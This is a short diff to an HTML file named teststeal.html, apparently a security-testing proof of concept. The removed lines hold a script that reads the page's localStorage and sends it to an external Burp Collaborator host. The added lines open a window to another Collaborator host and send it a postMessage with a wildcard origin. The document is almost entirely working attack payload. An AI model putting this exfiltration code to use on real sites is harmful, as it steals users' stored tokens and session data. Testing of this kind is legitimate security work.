--- a/teststeal.html
+++ b/teststeal.html
@@ -1,17 +1,4 @@
-aaaaaa 
-
-<script>var theUrl = ("https://qkezt6sje655wi5qss1sjkzeq5wykn.burpcollaborator.net?stolen=+" + JSON.stringify(localStorage))
-function httpGetAsync(theUrl, callback)
-{
-    var xmlHttp = new XMLHttpRequest();
-    xmlHttp.onreadystatechange = function() {
-        if (xmlHttp.readyState == 4 && xmlHttp.status == 200)
-            callback(xmlHttp.responseText);
-    }
-    xmlHttp.open("GET", theUrl, true); // true for asynchronous
-    xmlHttp.send(null);
-}
-
-
-httpGetAsync(theUrl);
-</script>
+<html><script>
+var w=window.open("https://lynu716es1j0adjl6nfnxfd940auyj.burpcollaborator.net")
+setTimeout(function(){w.postMessage('text here','*');}, 2000);
+    </script></html>
